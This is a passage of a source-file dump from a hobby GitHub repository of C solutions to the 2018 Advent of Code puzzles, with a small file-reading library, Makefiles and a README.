line_size = line_length(file_get_line(file, 0));\n char outstr[line_size];\n for (uint32_t i = 0; i < file_line_count(file); ++i) {\n line_t *l1 = file_get_line(file, i);\n for (uint32_t j = 0; j < file_line_count(file); ++j) {\n if (j != i) {\n line_t *l2 = file_get_line(file, j);\n memset(outstr, 0, line_size);\n int hd = hamming_distance(l1, l2, outstr);\n if (hd == 1) {\n printf(\"%s\\n\", outstr);\n goto out;\n return 0;\n }\n }\n }\n }\n\nout:\n file_free(file);\n}\n" }, { "alpha_fraction": 0.5368726253509521, "alphanum_fraction": 0.5479685664176941, "avg_line_length": 25.871559143066406, "blob_id": "5aa2945006cb5b2984e8f287b11ed9513b703c05", "content_id": "50ba3efa717d457dfbe8f6219bdd9f32a9c29c46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5858, "license_type": "permissive", "max_line_length": 173, "num_lines": 218, "path": "/Day5/Day5.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <time.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <pthread.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\n#define TRIGGER ((int)0x20)\n\n#define SHOULD_REACT(__a, __b) (abs(((int)__a) - ((int)__b)) == TRIGGER)\n#define DESTROY(__buf, __a, __b, __cnt) do { __buf[__a] = '\\0'; __buf[__b] = '\\0'; if (__a == 0) { __a += 2; __b += 2; } else { __a -= 1; __b += 1; } __cnt -= 2; } while (0)\n\ntypedef struct polymer {\n char *units;\n size_t total_size;\n size_t current_size;\n size_t start;\n size_t current;\n size_t next;\n} polymer_t;\n\npolymer_t *polymer_create(char *buf, size_t size)\n{\n polymer_t *polymer = calloc(1, sizeof(polymer_t));\n polymer->units = calloc(1, size);\n memcpy(polymer->units, buf, size);\n \n if (polymer->units[size - 1] == '\\n') {\n polymer->units[size - 1] = '\\0';\n size -= 1;\n }\n polymer->current_size = polymer->total_size = size;\n polymer->current = 0;\n polymer->start = 0;\n polymer->next = 1;\n return polymer;\n}\n\nvoid polymer_free(polymer_t *polymer)\n{\n if (polymer) {\n free(polymer->units);\n free(polymer);\n }\n}\n\nvoid polymer_print(polymer_t *polymer)\n{\n char buf[polymer->current_size + 1];\n memset(buf, 0, polymer->current_size + 1);\n for (size_t i = 0, j = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] != '\\0') {\n buf[j++] = polymer->units[i];\n }\n }\n printf(\"%s (C: %zu, N: %zu, Current: %zu, Total: %zu\\n\", buf, polymer->current, polymer->next, polymer->current_size, polymer->total_size);\n}\n\nstatic inline bool polymer_test(polymer_t *polymer)\n{\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n if (SHOULD_REACT(a, b)) {\n return true;\n } else {\n return false;\n }\n}\n\nstatic inline bool polymer_done_processing(polymer_t *polymer)\n{\n return (polymer->next == (polymer->total_size - 1));\n}\n\n#define likely(x) __builtin_expect((x),1)\n#define unlikely(x) __builtin_expect((x),0)\n\nstatic inline void polymer_update(polymer_t *polymer)\n{\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n\n // Case 1: We just destroyed a pair.\n if (a == '\\0' && b == '\\0') {\n // Special case: we destroy the first two units\n if (unlikely(polymer->current == polymer->start)) {\n // Skip over the destroyed units and set start to current\n polymer->current += 2;\n polymer->next += 2;\n polymer->start = polymer->current;\n } else {\n while (polymer->units[polymer->current] == '\\0') {\n polymer->current -= 1;\n }\n polymer->next += 1;\n }\n\n // Update size\n polymer->current_size -= 2;\n } else {\n // Case 2: We didn't destroy anything. Set current equal to next\n // and next is incremented by one\n polymer->current = polymer->next;\n polymer->next += 1;\n }\n}\n\nstatic inline void polymer_remove(polymer_t *polymer, char c)\n{\n for (size_t i = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] == c || polymer->units[i] == (c + TRIGGER)) {\n polymer->units[i] = '\\0';\n polymer->current_size -= 1;\n }\n }\n char *newbuf = calloc(1, polymer->current_size + 1);\n memset(newbuf, 0, polymer->current_size + 1);\n for (size_t i = 0, j = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] != '\\0') {\n newbuf[j++] = polymer->units[i];\n }\n }\n polymer->total_size = polymer->current_size;\n free(polymer->units);\n polymer->units = newbuf;\n //polymer_print(polymer);\n}\n\nstruct args {\n char c;\n char *buf;\n size_t size;\n};\n\nvoid polymer_destroy(polymer_t *polymer)\n{\n#if 0\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n printf(\"Destroyed %c%c\\n\", a, b);\n#endif\n polymer->units[polymer->current] = '\\0';\n polymer->units[polymer->next] = '\\0';\n}\n\nvoid *find_size_thread(void *args)\n{\n struct args *a = args;\n polymer_t *p = polymer_create(a->buf, a->size);\n polymer_remove(p, a->c);\n while (!polymer_done_processing(p)) {\n if (polymer_test(p)) {\n polymer_destroy(p);\n }\n polymer_update(p);\n }\n \n return (void *)p->current_size;\n}\n\nint main(int argc, char *argv[])\n{\n size_t polymer_length = 0;\n polymer_t *polymer = NULL;\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_open(argv[1]);\n DIE_IF((file == NULL), \"Could not read input %s\\n\", argv[1]);\n\n polymer_length = file_size(file);\n char *buf = file_contents(file);\n polymer = polymer_create(buf, polymer_length);\n\n while (!polymer_done_processing(polymer)) {\n if (polymer_test(polymer)) {\n polymer_destroy(polymer);\n }\n polymer_update(polymer);\n //polymer_print(polymer);\n }\n\n printf(\"The answer is %zu\\n\", polymer->current_size);\n size_t best_size = polymer->current_size;\n polymer_free(polymer);\n\n#if 1\n pthread_t threads[26];\n struct args *args = calloc(26, sizeof(struct args));\n for (char c = 'A'; c <= 'Z'; ++c) {\n int i = c - 'A';\n args[i].c = c;\n args[i].buf = buf;\n args[i].size = polymer_length;\n pthread_create(&threads[i], NULL, find_size_thread, &args[i]);\n }\n for (char c = 'A'; c <= 'Z'; ++c) {\n int i = c - 'A';\n size_t ret = 0;\n pthread_join(threads[i], (void **)&ret);\n if (ret < best_size) {\n best_size = ret;\n }\n }\n\n printf(\"The new best size is %zu\\n\", best_size);\n#endif\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5644444227218628, "alphanum_fraction": 0.6177777647972107, "avg_line_length": 19.454545974731445, "blob_id": "fd41e5cfb6f02a6513a08c2d16ced58ce79cb70f", "content_id": "a79e66049f326ffe286565f4a80ad86d716d2943", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 225, "license_type": "permissive", "max_line_length": 89, "num_lines": 11, "path": "/Day3/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "BIN=Day3\nGLIBFLAGS=-I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -lglib-2.0\nLIB=../lib/file.c\nLIBINC=-I ../lib\n\n$(BIN): $(LIB) $(BIN).c\n\tcc -O3 $^ $(LIBINC) -lbsd -o $@\n\n.PHONY: clean\nclean:\n\trm $(BIN)\n" }, { "alpha_fraction": 0.5116156339645386, "alphanum_fraction": 0.5192713737487793, "avg_line_length": 20.280899047851562, "blob_id": "37741d2f11051a4fa77f85582be1fc029d82a1f2", "content_id": "64ff22e74a46b2be4560a57c26115d06f8cc699a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3788, "license_type": "permissive", "max_line_length": 140, "num_lines": 178, "path": "/lib/file.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n\n#include \"utils.h\"\n#include \"file.h\"\n\nint line_cmp(const void *a, const void *b) \n{\n line_t *l1 = *(line_t **)a;\n line_t *l2 = *(line_t **)b;\n return strcmp(l1->str, l2->str);\n}\n\nvoid file_sort_lines(file_t *file)\n{\n qsort(file->lines, file->nlines, sizeof(file->lines[0]), file->sort_callback);\n}\n\nline_t *file_next_line(FILE *fp) {\n ssize_t bytes_read = 0;\n char *str = NULL;\n size_t len = 0;\n bytes_read = getline(&str, &len, fp);\n if (bytes_read < 0) {\n return NULL;\n }\n\n len = strlen(str);\n if (str[len - 1] == '\\n') {\n str[len - 1] = '\\0';\n len -= 1;\n }\n\n line_t *line = calloc(1, sizeof(*line));\n line->str = str;\n line->len = len;\n return line;\n}\n\nvoid file_line_free(line_t *line)\n{\n if (line) {\n free(line->str);\n free(line);\n }\n}\n\nfile_t *file_get_lines(const char *filename, line_transform_t transform_callback, line_data_free_t free_callback, line_sort_t sort_callback)\n{\n FILE *fp = fopen(filename, \"r\");\n VALIDATE_PTR_OR_RETURN(fp, NULL);\n\n file_t *file= calloc(1, sizeof(*file));\n VALIDATE_PTR_OR_RETURN(file, NULL);\n file->capacity = FILE_LINES_INITIAL_CAPACITY;\n file->lines = calloc(file->capacity, sizeof(line_t *));\n\n line_t *line = NULL;\n while ((line = file_next_line(fp)) != NULL) {\n if (file->nlines == (file->capacity)) {\n size_t new_capacity = 2 * file->capacity;\n file->lines = realloc(file->lines, (new_capacity * sizeof(line_t *)));\n file->capacity = new_capacity;\n }\n \n if (transform_callback) {\n transform_callback(line);\n }\n\n file->lines[file->nlines++] = line;\n }\n\n if (free_callback) {\n file->free_callback = free_callback;\n }\n\n if (sort_callback) {\n file->sort_callback = sort_callback;\n } else {\n file->sort_callback = line_cmp;\n }\n\n fclose(fp);\n return file;\n}\n\nvoid file_free(file_t *file)\n{\n if (file) {\n for (size_t i = 0; i < file->nlines; ++i) {\n line_t *line = file_get_line(file, i);\n if (line) {\n if (file->free_callback) {\n file->free_callback(line);\n }\n file_line_free(line);\n }\n }\n if (file->contents) {\n free(file->contents);\n }\n free(file->lines);\n free(file);\n }\n}\n\nline_t *file_get_line(file_t *file, uint32_t lineno)\n{\n if (lineno >= file->nlines) {\n return NULL;\n } else {\n return file->lines[lineno];\n }\n}\n\nlong *file_lines_get_as_numbers(file_t *file)\n{\n long *vals = calloc(file->nlines, sizeof(long));\n for (size_t i = 0; i < file->nlines; ++i) {\n vals[i] = strtol(file->lines[i]->str, NULL, 0);\n }\n return vals;\n}\n\nint file_get_size(const char *filename, size_t *size)\n{\n struct stat sb;\n if (stat(filename, &sb)) {\n return -1;\n }\n\n *size = sb.st_size;\n return 0;\n}\n\nfile_t *file_open(const char *filename)\n{\n file_t *file = calloc(1, sizeof(file_t));\n FILE *fp = NULL;\n int err = file_get_size(filename, &file->size);\n if (err) {\n goto out;\n }\n\n fp = fopen(filename, \"r\");\n if (fp == NULL) {\n err = -1;\n goto out;\n }\n\n file->contents = calloc(1, file->size);\n\n if (file->contents == NULL) {\n err = -1;\n goto out;\n }\n\n if (fread(file->contents, 1, file->size, fp) != file->size) {\n err = -1;\n goto out;\n }\n\n err = 0;\n\nout:\n if (err) {\n file_free(file);\n file = NULL;\n }\n fclose(fp);\n\n return file;\n}\n" }, { "alpha_fraction": 0.6467203497886658, "alphanum_fraction": 0.6507480144500732, "avg_line_length": 19.20930290222168, "blob_id": "67f9e2b96188185bae808a5fe55cee2e45927ed0", "content_id": "cfe1da9df1ea1243e1097996b15f5b130d51ffe6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1738, "license_type": "permissive", "max_line_length": 150, "num_lines": 86, "path": "/lib/file.h", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#ifndef FILE_H\n#define FILE_H\n\n#include <stdint.h>\n#include <unistd.h>\n#include <stdbool.h>\n\ntypedef struct line\n{\n char *str;\n size_t len;\n void *extra;\n} line_t;\n\ntypedef bool (*line_transform_t)(line_t *line);\ntypedef void (*line_data_free_t)(line_t *line);\ntypedef int (*line_sort_t)(const void *a, const void *b);\n\ntypedef struct file\n{\n char *contents;\n size_t size;\n size_t nlines;\n size_t capacity;\n line_t **lines;\n line_sort_t sort_callback;\n line_data_free_t free_callback;\n} file_t;\n\n\n#define FILE_LINES_INITIAL_CAPACITY (1000)\n\n#define file_for_each_line(__f, __l, __i) \\\n for (__i = 0, __l = (line_t *)(((file_t *)__f)->lines[__i]); __i < file_line_count(__f); ++(__i), __l = (line_t *)(((file_t *)__f)->lines[__i])) \\\n\n#ifdef __cplusplus\nextern \"C\" { \n#endif\n\nstatic inline char *line_string(line_t *line)\n{\n return line->str;\n}\n\nstatic inline size_t line_length(line_t *line)\n{\n return line->len;\n}\n\nstatic inline void *line_extra_data(line_t *line)\n{\n return line->extra;\n}\n\nstatic inline size_t file_line_count(file_t *file)\n{\n return file->nlines;\n}\n\nstatic inline size_t file_total_capacity(file_t *file)\n{\n return file->capacity;\n}\n\nstatic inline size_t file_size(file_t *file)\n{\n return file->size;\n}\n\nstatic inline char *file_contents(file_t *file)\n{\n return file->contents;\n}\n\nvoid file_sort_lines(file_t *lines);\nfile_t *file_get_lines(const char *filename, line_transform_t transform_callback, line_data_free_t free_callback, line_sort_t sort_callback);\nline_t *file_get_line(file_t *file, uint32_t lineno);\nlong *file_get_as_numbers(file_t *lines);\nvoid file_free(file_t *file);\nfile_t *file_open(const char *filename);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.5322580933570862, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 40.33333206176758, "blob_id": "9352d4f6e525e618a7f08a851264100bb283c1df", "content_id": "7c2bd045a0819b4a32832e64abe362e9c804f5a2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 372, "license_type": "permissive", "max_line_length": 122, "num_lines": 9, "path": "/lib/utils.h", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#ifndef UTILS_H\n#define UTILS_H\n\n#define DIE_IF(__cond, __msg, ...) if (__cond) { fprintf(stderr, \"[X] \" __msg \"\\n\", ## __VA_ARGS__); exit(EXIT_FAILURE); }\n#define ERR(__msg, ...) do { fprintf(stderr, \"[X] \" __msg \"\\n\", ## __VA_ARGS__); } while (0)\n\n#define VALIDATE_PTR_OR_RETURN(__ptr, __retval) if (0 == (__ptr)) { ERR(# __ptr \"is NULL!\"); return (__retval); }\n\n#endif\n" }, { "alpha_fraction": 0.7445651888847351, "alphanum_fraction": 0.7880434989929199, "avg_line_length": 60, "blob_id": "319fa60448428a18c847c8a9a4ab05b5701c3b87", "content_id": "838752ba1c4824733cb1f8616e9eaa5236b24cd1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 184, "license_type": "permissive", "max_line_length": 162, "num_lines": 3, "path": "/README.md", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "# AdventOfCode2018\n\nMy solutions to the 2018 Advent of Code, in C. I'm sure there are memory corruption bugs galore because I do minimal sanity checking and this is just for funsies. \n" }, { "alpha_fraction": 0.6092436909675598, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 46.599998474121094, "blob_id": "97d734d69aa22a72a54ef4b2f6d625751fbef3c3", "content_id": "bc73765c38270492533fa1a19659d6c6a7e12612", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "permissive", "max_line_length": 115, "num_lines": 5, "path": "/.ycm_project_conf.py", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "import os\n\ndef get_project_conf(flags, log):\n\tlib_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'lib')\n\treturn flags + ['-I', lib_path, '-I', '/usr/include/glib-2.0', '-I', '/usr/lib/x86_64-linux-gnu/glib-2.0/include']\n" }, { "alpha_fraction": 0.5113791823387146, "alphanum_fraction": 0.5279927253723145, "avg_line_length": 24.39884376525879, "blob_id": "58a68b31b8c3bb28b5da6cf9c55d696f743bc006", "content_id": "aac9faf5f6b3539038f7344fc2633643f6026829", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4394, "license_type": "permissive", "max_line_length": 96, "num_lines": 173, "path": "/Day3/Day3.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\ntypedef struct claim\n{\n uint32_t id;\n int from_left;\n int from_top;\n int width;\n int height;\n} claim_t;\n\nbool parse_claim(line_t *line)\n{\n char *s = line_string(line);\n claim_t *c = calloc(1, sizeof(claim_t));\n sscanf(s, \"#%u @ %u,%u: %ux%u\", &c->id, &c->from_left, &c->from_top, &c->width, &c->height);\n line->extra = c;\n return true;\n}\n\nvoid free_claim(line_t *line)\n{\n free(line->extra);\n}\n\ntypedef struct fabric\n{\n uint32_t width;\n uint32_t height;\n uint32_t **matrix;\n} fabric_t;\n\n#define FABRIC_SIDE_MIN (1000)\n#define MAX(__a, __b) (((__a) > (__b)) ? (__a) : (__b)) \n#define MIN(__a, __b) (((__a) < (__b)) ? (__a) : (__b)) \n\n#define UNIT_EMPTY 0\n#define UNIT_TAKEN 1\n#define UNIT_OVERLAP 2\n// matrix[0]\n// matric[1]\n\nfabric_t *fabric_create(uint32_t min_x, uint32_t min_y)\n{\n fabric_t *fabric = calloc(1, sizeof(fabric_t));\n fabric->width = MAX(min_x, FABRIC_SIDE_MIN);\n fabric->height = MAX(min_y, FABRIC_SIDE_MIN);\n fabric->matrix = calloc(fabric->height, sizeof(uint32_t *));\n for (uint32_t i = 0; i < fabric->height; ++i) {\n fabric->matrix[i] = calloc(fabric->width, sizeof(uint32_t));\n }\n\n return fabric;\n}\n\nvoid fabric_free(fabric_t *fabric)\n{\n if (fabric && fabric->matrix) {\n for (uint32_t i = 0; i < fabric->height; ++i) {\n free(fabric->matrix[i]);\n }\n free(fabric->matrix);\n free(fabric);\n }\n}\n\nvoid fabric_claim_area(fabric_t *fabric, claim_t *claim)\n{\n uint32_t y_end = claim->from_top + claim->height;\n uint32_t x_end = claim->from_left + claim->width;\n for (uint32_t y = claim->from_top; y < y_end; ++y) {\n for (uint32_t x = claim->from_left; x < x_end; ++x) {\n uint32_t *valuep = &fabric->matrix[y][x];\n switch (*valuep) {\n case UNIT_EMPTY:\n *valuep = UNIT_TAKEN;\n break;\n case UNIT_TAKEN:\n *valuep = UNIT_OVERLAP;\n break;\n default:\n break;\n }\n }\n }\n}\n\nbool fabric_check_claim(fabric_t *fabric, claim_t *claim)\n{\n uint32_t y_end = claim->from_top + claim->height;\n uint32_t x_end = claim->from_left + claim->width;\n for (uint32_t y = claim->from_top; y < y_end; ++y) {\n for (uint32_t x = claim->from_left; x < x_end; ++x) {\n uint32_t value = fabric->matrix[y][x];\n if (value == UNIT_OVERLAP) {\n return false;\n }\n }\n }\n return true;\n}\n\nuint32_t fabric_compute_overlap(fabric_t *fabric)\n{\n uint32_t overlap = 0;\n for (uint32_t y = 0; y < fabric->height; ++y) {\n for (uint32_t x = 0; x < fabric->width; ++x) {\n if (fabric->matrix[y][x] == UNIT_OVERLAP) {\n overlap++;\n }\n }\n }\n return overlap;\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], parse_claim, free_claim, NULL);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n int furthest_x = 0;\n int furthest_y = 0;\n line_t *line = NULL;\n size_t i = 0;\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line);\n int x = claim->from_left + claim->width;\n int y = claim->from_top + claim->height;\n if (x > furthest_x) {\n furthest_x = x;\n }\n\n if (y > furthest_y) {\n furthest_y = y;\n }\n }\n fabric_t *fabric = fabric_create(furthest_x, furthest_y);\n\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line); \n fabric_claim_area(fabric, claim);\n }\n\n uint32_t overlap = fabric_compute_overlap(fabric);\n printf(\"Total Overlap: %u\\n\", overlap);\n\n file_for_each_line(file, line, i) {\n claim_t *claim = line_extra_data(line); \n bool no_overlap = fabric_check_claim(fabric, claim);\n if (no_overlap) {\n printf(\"Claim %u doesn't have any overlap\\n\", claim->id);\n break;\n }\n }\n\n fabric_free(fabric);\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5023611783981323, "alphanum_fraction": 0.5179938077926636, "avg_line_length": 30.015151977539062, "blob_id": "c06baed6f891a24de46c9bf52c2cf4b51ca80a15", "content_id": "c2618bea15a703e1444899159f59bc41ecc252a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 6141, "license_type": "permissive", "max_line_length": 302, "num_lines": 198, "path": "/Day4/Day4.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <time.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\ntypedef enum\n{\n EVENT_BEGIN_SHIFT = 0,\n EVENT_FALL_ASLEEP,\n EVENT_WAKEUP,\n} event_type_t;\n\ntypedef struct event\n{\n uint32_t guard_id;\n event_type_t type;\n struct tm datetime; \n time_t time;\n} event_t;\n\ntypedef struct guard_stats\n{\n uint32_t guard_id;\n uint32_t most_seen_minute;\n uint32_t minutes[60];\n uint32_t total_minutes_asleep;\n} guard_stats_t;\n\ntypedef struct minute_stats\n{\n uint32_t guard_id;\n uint32_t times_asleep;\n} minute_stats_t;\n\nuint32_t highest_guard_id = 0;\n\nbool parse_event(line_t *line)\n{\n event_t *event = calloc(1, sizeof(event_t));\n char *s = line_string(line);\n char *event_str = NULL;\n sscanf(s, \"[%d-%d-%d %02d:%02d] \", &event->datetime.tm_year, &event->datetime.tm_mon, &event->datetime.tm_mday, &event->datetime.tm_hour, &event->datetime.tm_min);\n event->datetime.tm_isdst = 1;\n event->datetime.tm_year = 2018 - 1900;\n event->datetime.tm_mon--;\n event->time = timegm(&event->datetime);\n char *leftbracket = strchr(s, ']');\n event_str = leftbracket + 2;\n if (!strcmp(event_str, \"falls asleep\")) {\n event->type = EVENT_FALL_ASLEEP;\n } else if (!strcmp(event_str, \"wakes up\")) {\n event->type = EVENT_WAKEUP;\n } else {\n event->type = EVENT_BEGIN_SHIFT;\n sscanf(event_str, \"Guard #%u begins shift\", &event->guard_id);\n if (event->guard_id > highest_guard_id) {\n highest_guard_id = event->guard_id;\n }\n }\n \n line->extra = event;\n return true;\n}\n\nvoid free_event(line_t *line)\n{\n free(line->extra);\n}\n\nchar *event_make_string(event_t *event)\n{\n static char buf[1024] = {0};\n switch (event->type) {\n case EVENT_WAKEUP:\n return \"wakes up\";\n case EVENT_FALL_ASLEEP:\n return \"falls asleep\";\n case EVENT_BEGIN_SHIFT:\n memset(buf, 0, sizeof(buf));\n snprintf(buf, 1024, \"Guard #%u begins shift\", event->guard_id);\n return buf;\n default:\n return \"Unknown event?!?!\";\n }\n}\n\nint sort_event(const void *a, const void *b)\n{\n line_t *l1 = *(line_t **)a;\n line_t *l2 = *(line_t **)b;\n event_t *e1 = l1->extra;\n event_t *e2 = l2->extra;\n time_t t1 = e1->time;\n time_t t2 = e2->time;\n\n if (t1 == t2) {\n return 0;\n } else if (t1 < t2) {\n return -1;\n } else {\n return 1;\n }\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], parse_event, free_event, sort_event);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n line_t *line = NULL;\n size_t i = 0;\n file_sort_lines(file);\n guard_stats_t *stats = calloc(highest_guard_id, sizeof(guard_stats_t));\n\n uint32_t current_id = 0;\n uint32_t fall_asleep = 0;\n uint32_t wakeup = 0;\n guard_stats_t *most_sleepy_guard = NULL;\n minute_stats_t minutes[60];\n memset((void *)&minutes[0], 0, sizeof(minutes));\n uint32_t most_seen_minute = -1;\n uint32_t times_most_seen_minute = 0;\n file_for_each_line(file, line, i) {\n event_t *event = line_extra_data(line);\n switch (event->type) {\n case EVENT_BEGIN_SHIFT:\n {\n current_id = event->guard_id - 1;\n stats[current_id].guard_id = event->guard_id;\n if (most_sleepy_guard == NULL) {\n most_sleepy_guard = &stats[current_id];\n }\n break;\n }\n case EVENT_FALL_ASLEEP:\n {\n fall_asleep = event->datetime.tm_min;\n break;\n }\n case EVENT_WAKEUP:\n {\n wakeup = event->datetime.tm_min;\n guard_stats_t *gs = &stats[current_id];\n gs->total_minutes_asleep += (wakeup - fall_asleep);\n if (gs->guard_id != most_sleepy_guard->guard_id) {\n if (gs->total_minutes_asleep > most_sleepy_guard->total_minutes_asleep) {\n most_sleepy_guard = gs;\n }\n }\n for (uint32_t i = fall_asleep; i < wakeup; ++i) {\n gs->minutes[i] += 1;\n if (gs->minutes[i] > gs->minutes[gs->most_seen_minute]) {\n gs->most_seen_minute = i;\n }\n\n if (minutes[i].times_asleep == 0) {\n minutes[i].guard_id = gs->guard_id;\n minutes[i].times_asleep = 1;\n } else {\n if (gs->minutes[i] > minutes[i].times_asleep) {\n minutes[i].guard_id = gs->guard_id;\n minutes[i].times_asleep = gs->minutes[i];\n }\n }\n\n if (most_seen_minute == (uint32_t)-1) {\n most_seen_minute = i; \n times_most_seen_minute = 1;\n } else {\n if (times_most_seen_minute < minutes[i].times_asleep) {\n most_seen_minute = i;\n times_most_seen_minute = minutes[i].times_asleep;\n }\n }\n }\n break;\n }\n }\n }\n\n printf(\"The most sleepy guard is %u with %u total minutes asleep, and is most often asleep at minute %u. Answer is %u\\n\", most_sleepy_guard->guard_id, most_sleepy_guard->total_minutes_asleep, most_sleepy_guard->most_seen_minute, (most_sleepy_guard->guard_id * most_sleepy_guard->most_seen_minute));\n printf(\"Guard %u spent minute %u more than any other guard or minute. Answer is %u\\n\", minutes[most_seen_minute].guard_id, most_seen_minute,(minutes[most_seen_minute].guard_id * most_seen_minute));\n free(stats);\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 19.22222137451172, "blob_id": "34e775de7af4fed2a30368482889ee7e44b3c2a1", "content_id": "05c013e906f50664b2b60af5dcbe186d8d52246c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 182, "license_type": "permissive", "max_line_length": 89, "num_lines": 9, "path": "/Day1/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "BIN=Day1\nGLIBFLAGS=-I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -lglib-2.0\n\n$(BIN): $(BIN).c\n\tcc $^ $(GLIBFLAGS) -lbsd -o $@\n\n.PHONY: clean\nclean:\n\trm $(BIN)\n" }, { "alpha_fraction": 0.553648054599762, "alphanum_fraction": 0.6051502227783203, "avg_line_length": 9.590909004211426, "blob_id": "1be75e8ec4c07c3e251f91ec9c773fa8b89b416d", "content_id": "b4320041b98a97856bbcb3b26e8403e2bd1dc87f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 233, "license_type": "permissive", "max_line_length": 25, "num_lines": 22, "path": "/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "DAYS=Day1 Day2 Day3 Day4\n\n.PHONY: all clean $(DAYS)\nall: $(DAYS)\n\nDay1: \n\tmake -C $@\n\nDay2: \n\tmake -C $@\n\nDay3: \n\tmake -C $@\n\nDay4: \n\tmake -C $@\n\nclean:\n\tmake clean -C Day1\n\tmake clean -C Day2\n\tmake clean -C Day3\n\tmake clean -C Day4\n" } ]
13
vinicius-dourado/chamberofdeputiesBrazil
https://github.com/vinicius-dourado/chamberofdeputiesBrazil
2dae9ab2917fa883f9987b7487b81c21bd545bc5
0bed4a0bfe908db2ec716571e384889e32d42699
eaf86c6d54712e861ba67291defce03212a29c44
refs/heads/master
2022-09-16T22:04:03.811230
2017-11-01T13:32:51
2017-11-01T13:32:51
109,134,396
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6261510252952576, "alphanum_fraction": 0.6440410614013672, "avg_line_length": 30.22881317138672, "blob_id": "0266a8996bc9835ee5564b90cacbd85face8a809", "content_id": "4eedfab1c4c3947e4d02ef66f1931a01e1440b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3832, "license_type": "no_license", "max_line_length": 141, "num_lines": 118, "path": "/categorizacao_automatica.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "# coding: utf-8\r\nfrom __future__ import print_function\r\nfrom time import time\r\nimport sys\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\r\nfrom sklearn.datasets import fetch_20newsgroups\r\nimport numpy as np\r\nimport lda\r\nimport nltk\r\nimport unicodedata\r\nimport csv\r\nimport pandas as pd\r\n\r\n\r\ndef get_vocab(data_samples):\r\n vocab = set()\r\n for v in data_samples:\r\n tokens = v.split()\r\n for token in tokens:\r\n vocab.add(token)\r\n return tuple(vocab)\r\n\r\ndef force_decode(string, 